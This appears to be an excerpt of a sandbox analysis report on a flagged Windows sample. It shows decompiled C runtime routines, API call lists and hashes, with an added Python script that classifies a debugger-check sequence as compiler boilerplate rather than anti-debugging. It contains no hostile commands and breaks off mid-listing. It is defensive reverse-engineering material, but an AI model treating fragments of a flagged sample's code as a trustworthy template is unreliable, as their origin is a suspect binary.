                                                                                                                                                                                                    • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                    • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%
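The five API references above are the MSVC CRT's /GS security-failure fail-fast path (__report_gsfailure / __raise_securityfailure), not sample-specific anti-debugging: IsDebuggerPresent is consulted only to decide whether the fault is routed to an attached debugger, the top-level filter is cleared with SetUnhandledExceptionFilter(NULL), UnhandledExceptionFilter is invoked, and the process exits with STATUS_STACK_BUFFER_OVERRUN (0xC0000409). Triage tooling that scores every IsDebuggerPresent as an evasion indicator over-counts this compiler boilerplate. The following Python is an added example, not code from the Joe Sandbox report or from the sample: it parses API lines in the format shown above and tags an IsDebuggerPresent that sits inside this exact sequence as CRT boilerplate rather than as an anti-debug candidate. Joe Sandbox attributes the 0xC0000409 argument to the GetCurrentProcess line (the value is pushed before the inner call), so the check inspects both calls. The second API block is constructed for illustration and is not from this report.

```python
import re
from dataclasses import dataclass
from typing import List

STATUS_STACK_BUFFER_OVERRUN = 0xC0000409

# Call order emitted by the MSVC CRT security-failure fail-fast path.
GS_FAILURE_SEQUENCE = [
    "IsDebuggerPresent",
    "SetUnhandledExceptionFilter",
    "UnhandledExceptionFilter",
    "GetCurrentProcess",
    "TerminateProcess",
]

# Matches Joe Sandbox "APIs" lines such as
#   • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
#   • IsDebuggerPresent.KERNEL32 ref: 004136F4
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Copied from the report block above (real data from this analysis).
JOE_APIS_BLOCK = """\
• IsDebuggerPresent.KERNEL32 ref: 004136F4
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
• UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
• GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
• TerminateProcess.KERNEL32(00000000), ref: 00413737
"""

# Constructed for illustration: a bare debugger check followed by an exit,
# which is the shape a real anti-debug stub would have.
CONSTRUCTED_ANTI_DEBUG_BLOCK = """\
• IsDebuggerPresent.KERNEL32 ref: 00401010
• ExitProcess.KERNEL32(00000001), ref: 00401020
"""


@dataclass
class ApiRef:
    name: str
    module: str
    args: List[int]   # hex arguments as shown by the sandbox, in order
    ref: int          # address of the call site


def parse_api_refs(block: str) -> List[ApiRef]:
    """Parse sandbox API lines into ApiRef records sorted by call-site address."""
    refs = []
    for line in block.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [int(a, 16) for a in raw.split(",") if a.strip()]
        refs.append(ApiRef(m.group("name"), m.group("module").upper(),
                           args, int(m.group("ref"), 16)))
    refs.sort(key=lambda r: r.ref)
    return refs


def _in_order(names, wanted):
    # Every wanted name appears, in the given order (other calls may sit between).
    it = iter(names)
    return all(any(n == w for n in it) for w in wanted)


def is_gs_failure_handler(refs: List[ApiRef]) -> bool:
    """True if the call sequence is the CRT /GS fail-fast handler."""
    names = [r.name for r in refs]
    if not _in_order(names, GS_FAILURE_SEQUENCE):
        return False
    # The CRT clears the top-level filter (argument 0) before raising the fault.
    unhooks_seh = any(r.name == "SetUnhandledExceptionFilter" and r.args[:1] == [0]
                      for r in refs)
    # The exit code must be STATUS_STACK_BUFFER_OVERRUN; the sandbox may show it
    # on either GetCurrentProcess or TerminateProcess depending on push order.
    exits_with_gs_code = any(STATUS_STACK_BUFFER_OVERRUN in r.args
                             for r in refs
                             if r.name in ("GetCurrentProcess", "TerminateProcess"))
    return unhooks_seh and exits_with_gs_code


def classify_debugger_check(refs: List[ApiRef]) -> str:
    """Label the IsDebuggerPresent usage in one function's API list."""
    if not any(r.name == "IsDebuggerPresent" for r in refs):
        return "none"
    return "crt-fail-fast" if is_gs_failure_handler(refs) else "anti-debug-candidate"


if __name__ == "__main__":
    for label, block in (("report", JOE_APIS_BLOCK),
                         ("constructed", CONSTRUCTED_ANTI_DEBUG_BLOCK)):
        print(label, classify_debugger_check(parse_api_refs(block)))
```

The ordering check tolerates unrelated calls between the five, which is what a decompiler listing of an inlined CRT routine usually looks like; the two argument checks are what separate this sequence from a hand-written SetUnhandledExceptionFilter trick, which would not both clear the filter and exit with 0xC0000409.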

                                                                                                                                                                                                    C-Code - Quality: 100%
			E0040ADB0(intOrPtr* __ecx) {
				void* _t5;
				intOrPtr* _t11;

				_t11 = __ecx;
				_t5 =  *(__ecx + 8);
				 *__ecx = 0x41eff0;       // rewrite the vtable pointer: destructor of a class whose vtable is at 0x41eff0
				if(_t5 != 0) {
					// call vtable slot 3 (offset 8) of the object stored at this+8, passing it as 'this';
					// consistent with IUnknown::Release() if that member is a COM interface pointer
					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
				}
				if( *(_t11 + 0xc) != 0) {
					_t5 = GetProcessHeap();
					if(_t5 != 0) {
						return HeapFree(_t5, 0,  *(_t11 + 0xc));   // release the buffer at this+0xc back to the process heap
					}
				}
				return _t5;
			}
Instruction offsets for the listing above: 0x0040adb3 to 0x0040ade8

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$FreeProcess
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3859560861-0
                                                                                                                                                                                                    • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                    • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363962162.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2460000_caQi43qE17.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 7e0f7542cbd4f9c9fee7600b373eaa7c071831ab8aab0d5223339b9ce5b3ea02
                                                                                                                                                                                                    • Instruction ID: 3846496d86eed097eb6aebf163977e45481d8fdf4be90c48872fe3686ac03b8d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e0f7542cbd4f9c9fee7600b373eaa7c071831ab8aab0d5223339b9ce5b3ea02
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F741D2B4E00649DFDB14CFA9D988AAEBBF1BF09304F20912AE415BB354D7749845CF86
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363557485.00000000008D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 008D6000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_8d6000_caQi43qE17.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
• Instruction ID: d0e9d29755664e596f5cf7bf6d6a06d22233578bc10d66a8d99bb3077c684cda
• Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
• Instruction Fuzzy Hash: 2311CE72340504AFD700CF59DC81FA673EAFB89360B29816AED04CB386E675EC01C760
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%
E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
	signed int _v8;
	int _v12;
	int _v16;
	int _v20;
	intOrPtr _v24;
	void* _v36;
	void* __ebx;
	void* __edi;
	void* __esi;
	void* __ebp;
	signed int _t110;
	intOrPtr _t112;
	intOrPtr _t113;
	short* _t115;
	short* _t116;
	char* _t120;
	short* _t121;
	short* _t123;
	short* _t127;
	int _t128;
	short* _t141;
	signed int _t144;
	void* _t146;
	short* _t147;
	signed int _t150;
	short* _t153;
	char* _t157;
	int _t160;
	long _t162;
	signed int _t174;
	signed int _t178;
	signed int _t179;
	int _t182;
	short* _t184;
	signed int _t186;
	signed int _t188;
	short* _t189;
	int _t191;
	intOrPtr _t194;
	int _t207;

	_t110 =  *0x422234; // 0xf2638ec2
	_v8 = _t110 ^ _t188;
	_t184 = __ecx;
	_t194 =  *0x423e7c; // 0x1
	if(_t194 == 0) {
		_t182 = 1;
		if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
			_t162 = GetLastError();
			__eflags = _t162 - 0x78;
			if(_t162 == 0x78) {
				 *0x423e7c = 2;
			}
		} else {
			 *0x423e7c = 1;
		}
	}
	if(_a16 <= 0) {
		L13:
		_t112 =  *0x423e7c; // 0x1
		if(_t112 == 2 || _t112 == 0) {
			_v16 = 0;
			_v20 = 0;
			__eflags = _a4;
			if(_a4 == 0) {
				_a4 =  *((intOrPtr*)( *_t184 + 0x14));
			}
			__eflags = _a28;
			if(_a28 == 0) {
				_a28 =  *((intOrPtr*)( *_t184 + 4));
			}
			_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
			_v24 = _t113;
			__eflags = _t113 - 0xffffffff;
			if(_t113 != 0xffffffff) {
				__eflags = _t113 - _a28;
				if(_t113 == _a28) {
					_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					L78:
					__eflags = _v16;
					if(__eflags != 0) {
						_push(_v16);
						E0040B6B5(0, _t182, _t184, __eflags);
					}
					_t115 = _v20;
					__eflags = _t115;
					if(_t115 != 0) {
						__eflags = _a20 - _t115;
						if(__eflags != 0) {
							_push(_t115);
							E0040B6B5(0, _t182, _t184, __eflags);
						}
					}
					_t116 = _t184;
					goto L84;
				}
				_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
				_t191 =  &(_t189[0xc]);
				_v16 = _t120;
				__eflags = _t120;
				if(_t120 == 0) {
					goto L58;
				}
				_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
				_v12 = _t121;
				__eflags = _t121;
				if(__eflags != 0) {
					if(__eflags <= 0) {
						L71:
						_t182 = 0;
						__eflags = 0;
						L72:
						__eflags = _t182;
						if(_t182 == 0) {
							goto L62;
						}
						E0040BA30(_t182, _t182, 0, _v12);
						_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
						_v12 = _t123;
						__eflags = _t123;
						if(_t123 != 0) {
							_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
							_v20 = _t186;
							asm("sbb esi, esi");
							_t184 =  ~_t186 & _v12;
							__eflags = _t184;
						} else {
							_t184 = 0;
						}
						E004147AE(_t182);
						goto L78;
					}
					__eflags = _t121 - 0xffffffe0;
					if(_t121 > 0xffffffe0) {
						goto L71;
					}
					_t127 =  &(_t121[4]);
					__eflags = _t127 - 0x400;
					if(_t127 > 0x400) {
						_t128 = E0040B84D(0, _t179, _t182, _t127);
						__eflags = _t128;
						if(_t128 != 0) {
							 *_t128 = 0xdddd;
							_t128 = _t128 + 8;
							__eflags = _t128;
						}
						_t182 = _t128;
						goto L72;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								E0040CFB0(_t127);
                                                                                                                                                                                                    								_t182 = _t191;
                                                                                                                                                                                                    								__eflags = _t182;
                                                                                                                                                                                                    								if(_t182 == 0) {
                                                                                                                                                                                                    									goto L62;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								 *_t182 = 0xcccc;
                                                                                                                                                                                                    								_t182 = _t182 + 8;
                                                                                                                                                                                                    								goto L72;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							L62:
                                                                                                                                                                                                    							_t184 = 0;
                                                                                                                                                                                                    							goto L78;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							goto L58;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(_t112 != 1) {
                                                                                                                                                                                                    							L58:
                                                                                                                                                                                                    							_t116 = 0;
                                                                                                                                                                                                    							L84:
                                                                                                                                                                                                    							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_v12 = 0;
                                                                                                                                                                                                    						if(_a28 == 0) {
                                                                                                                                                                                                    							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t184 = MultiByteToWideChar;
                                                                                                                                                                                                    						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                                                                                                                    						_t207 = _t182;
                                                                                                                                                                                                    						if(_t207 == 0) {
                                                                                                                                                                                                    							goto L58;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							if(_t207 <= 0) {
                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                    								_v16 = 0;
                                                                                                                                                                                                    								L29:
                                                                                                                                                                                                    								if(_v16 == 0) {
                                                                                                                                                                                                    									goto L58;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                                                                                                                                                                    									L52:
                                                                                                                                                                                                    									E004147AE(_v16);
                                                                                                                                                                                                    									_t116 = _v12;
                                                                                                                                                                                                    									goto L84;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t184 = LCMapStringW;
                                                                                                                                                                                                    								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                                                                                                                                                                    								_v12 = _t174;
                                                                                                                                                                                                    								if(_t174 == 0) {
                                                                                                                                                                                                    									goto L52;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								if((_a8 & 0x00000400) == 0) {
                                                                                                                                                                                                    									__eflags = _t174;
                                                                                                                                                                                                    									if(_t174 <= 0) {
                                                                                                                                                                                                    										L44:
                                                                                                                                                                                                    										_t184 = 0;
                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                    										L45:
                                                                                                                                                                                                    										__eflags = _t184;
                                                                                                                                                                                                    										if(_t184 != 0) {
                                                                                                                                                                                                    											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                                                                                                                                                                    											__eflags = _t141;
                                                                                                                                                                                                    											if(_t141 != 0) {
                                                                                                                                                                                                    												_push(0);
                                                                                                                                                                                                    												_push(0);
                                                                                                                                                                                                    												__eflags = _a24;
                                                                                                                                                                                                    												if(_a24 != 0) {
                                                                                                                                                                                                    													_push(_a24);
                                                                                                                                                                                                    													_push(_a20);
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_push(0);
                                                                                                                                                                                                    													_push(0);
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											E004147AE(_t184);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										goto L52;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t144 = 0xffffffe0;
                                                                                                                                                                                                    									_t179 = _t144 % _t174;
                                                                                                                                                                                                    									__eflags = _t144 / _t174 - 2;
                                                                                                                                                                                                    									if(_t144 / _t174 < 2) {
                                                                                                                                                                                                    										goto L44;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t52 = _t174 + 8; // 0x8
                                                                                                                                                                                                    									_t146 = _t174 + _t52;
                                                                                                                                                                                                    									__eflags = _t146 - 0x400;
                                                                                                                                                                                                    									if(_t146 > 0x400) {
                                                                                                                                                                                                    										_t147 = E0040B84D(0, _t179, _t182, _t146);
                                                                                                                                                                                                    										__eflags = _t147;
                                                                                                                                                                                                    										if(_t147 != 0) {
                                                                                                                                                                                                    											 *_t147 = 0xdddd;
                                                                                                                                                                                                    											_t147 =  &(_t147[4]);
                                                                                                                                                                                                    											__eflags = _t147;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t184 = _t147;
                                                                                                                                                                                                    										goto L45;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									E0040CFB0(_t146);
                                                                                                                                                                                                    									_t184 = _t189;
                                                                                                                                                                                                    									__eflags = _t184;
                                                                                                                                                                                                    									if(_t184 == 0) {
                                                                                                                                                                                                    										goto L52;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									 *_t184 = 0xcccc;
                                                                                                                                                                                                    									_t184 =  &(_t184[4]);
                                                                                                                                                                                                    									goto L45;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								if(_a24 != 0 && _t174 <= _a24) {
                                                                                                                                                                                                    									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L52;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t150 = 0xffffffe0;
                                                                                                                                                                                                    							_t179 = _t150 % _t182;
                                                                                                                                                                                                    							if(_t150 / _t182 < 2) {
                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t25 = _t182 + 8; // 0x8
                                                                                                                                                                                                    							_t152 = _t182 + _t25;
                                                                                                                                                                                                    							if(_t182 + _t25 > 0x400) {
                                                                                                                                                                                                    								_t153 = E0040B84D(0, _t179, _t182, _t152);
                                                                                                                                                                                                    								__eflags = _t153;
								if(_t153 == 0) {
									L27:
									_v16 = _t153;
									goto L29;
								}
								 *_t153 = 0xdddd;
								L26:
								_t153 =  &(_t153[4]);
								goto L27;
							}
							E0040CFB0(_t152);
							_t153 = _t189;
							if(_t153 == 0) {
								goto L27;
							}
							 *_t153 = 0xcccc;
							goto L26;
						}
					}
				}
				_t178 = _a16;
				_t157 = _a12;
				while(1) {
					_t178 = _t178 - 1;
					if( *_t157 == 0) {
						break;
					}
					_t157 =  &(_t157[1]);
					if(_t178 != 0) {
						continue;
					}
					_t178 = _t178 | 0xffffffff;
					break;
				}
				_t160 = _a16 - _t178 - 1;
				if(_t160 < _a16) {
					_t160 = _t160 + 1;
				}
				_a16 = _t160;
				goto L13;
			}
                                                                                                                                                                                                    0x0041712d
                                                                                                                                                                                                    0x0041712d
                                                                                                                                                                                                    0x00417130
                                                                                                                                                                                                    0x00417153
                                                                                                                                                                                                    0x00417155
                                                                                                                                                                                                    0x00417157
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0041715d
                                                                                                                                                                                                    0x0041715d
                                                                                                                                                                                                    0x004171a2
                                                                                                                                                                                                    0x004171a2
                                                                                                                                                                                                    0x004171a5
                                                                                                                                                                                                    0x004171a8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004171c1
                                                                                                                                                                                                    0x004172aa
                                                                                                                                                                                                    0x004172ad
                                                                                                                                                                                                    0x004172b2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004172b5
                                                                                                                                                                                                    0x004171c7
                                                                                                                                                                                                    0x004171db
                                                                                                                                                                                                    0x004171dd
                                                                                                                                                                                                    0x004171e2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004171ef
                                                                                                                                                                                                    0x0041721a
                                                                                                                                                                                                    0x0041721c
                                                                                                                                                                                                    0x00417263
                                                                                                                                                                                                    0x00417263
                                                                                                                                                                                                    0x00417263
                                                                                                                                                                                                    0x00417265
                                                                                                                                                                                                    0x00417265
                                                                                                                                                                                                    0x00417267
                                                                                                                                                                                                    0x00417277
                                                                                                                                                                                                    0x0041727d
                                                                                                                                                                                                    0x0041727f
                                                                                                                                                                                                    0x00417281
                                                                                                                                                                                                    0x00417282
                                                                                                                                                                                                    0x00417283
                                                                                                                                                                                                    0x00417286
                                                                                                                                                                                                    0x0041728c
                                                                                                                                                                                                    0x0041728f
                                                                                                                                                                                                    0x00417288
                                                                                                                                                                                                    0x00417288
                                                                                                                                                                                                    0x00417289
                                                                                                                                                                                                    0x00417289
                                                                                                                                                                                                    0x004172a0
                                                                                                                                                                                                    0x004172a0
                                                                                                                                                                                                    0x004172a4
                                                                                                                                                                                                    0x004172a9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00417267
                                                                                                                                                                                                    0x00417222
                                                                                                                                                                                                    0x00417223
                                                                                                                                                                                                    0x00417225
                                                                                                                                                                                                    0x00417228
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0041722a
                                                                                                                                                                                                    0x0041722a
                                                                                                                                                                                                    0x0041722e
                                                                                                                                                                                                    0x00417233
                                                                                                                                                                                                    0x0041724c
                                                                                                                                                                                                    0x00417252
                                                                                                                                                                                                    0x00417254
                                                                                                                                                                                                    0x00417256
                                                                                                                                                                                                    0x0041725c
                                                                                                                                                                                                    0x0041725c
                                                                                                                                                                                                    0x0041725c
                                                                                                                                                                                                    0x0041725f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0041725f
                                                                                                                                                                                                    0x00417235
                                                                                                                                                                                                    0x0041723a
                                                                                                                                                                                                    0x0041723c
                                                                                                                                                                                                    0x0041723e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00417240
                                                                                                                                                                                                    0x00417246
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00417246
                                                                                                                                                                                                    0x004171f4
                                                                                                                                                                                                    0x00417213
                                                                                                                                                                                                    0x00417213
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004171f4
                                                                                                                                                                                                    0x00417163
                                                                                                                                                                                                    0x00417164
                                                                                                                                                                                                    0x00417169
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0041716b
                                                                                                                                                                                                    0x0041716b
                                                                                                                                                                                                    0x00417174
                                                                                                                                                                                                    0x0041718a
                                                                                                                                                                                                    0x00417190
                                                                                                                                                                                                    0x00417192
                                                                                                                                                                                                    0x0041719d
                                                                                                                                                                                                    0x0041719d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0041719d
                                                                                                                                                                                                    0x00417194
                                                                                                                                                                                                    0x0041719a
                                                                                                                                                                                                    0x0041719a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0041719a
                                                                                                                                                                                                    0x00417176
                                                                                                                                                                                                    0x0041717b
                                                                                                                                                                                                    0x0041717f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00417181
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00417181
                                                                                                                                                                                                    0x00417157
                                                                                                                                                                                                    0x00417109
                                                                                                                                                                                                    0x004170df
                                                                                                                                                                                                    0x004170e2
                                                                                                                                                                                                    0x004170e5
                                                                                                                                                                                                    0x004170e5
                                                                                                                                                                                                    0x004170e8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004170ea
                                                                                                                                                                                                    0x004170ed
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004170ef
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004170ef
                                                                                                                                                                                                    0x004170f7
                                                                                                                                                                                                    0x004170fb
                                                                                                                                                                                                    0x004170fd
                                                                                                                                                                                                    0x004170fd
                                                                                                                                                                                                    0x004170fe
                                                                                                                                                                                                    0x00000000

APIs
• LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
• GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,007718B0), ref: 004170C5
• MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
• _malloc.LIBCMT ref: 0041718A
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
• LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
• LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
• _malloc.LIBCMT ref: 0041724C
• LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
• __freea.LIBCMT ref: 004172A4
                                                                                                                                                                                                    • __freea.LIBCMT ref: 004172AD
                                                                                                                                                                                                    • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                                                                    • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                                                                    • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                                                                    • _malloc.LIBCMT ref: 00417362
                                                                                                                                                                                                    • _memset.LIBCMT ref: 00417384
                                                                                                                                                                                                    • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                                                                                    • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                                                                    • __freea.LIBCMT ref: 004173CF
                                                                                                                                                                                                    • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                     • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3809854901-0
                                                                                                                                                                                                    • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                                                    • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                    			E004057B0(intOrPtr* __eax) {
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                                                    				char* _t60;
                                                                                                                                                                                                    				char _t62;
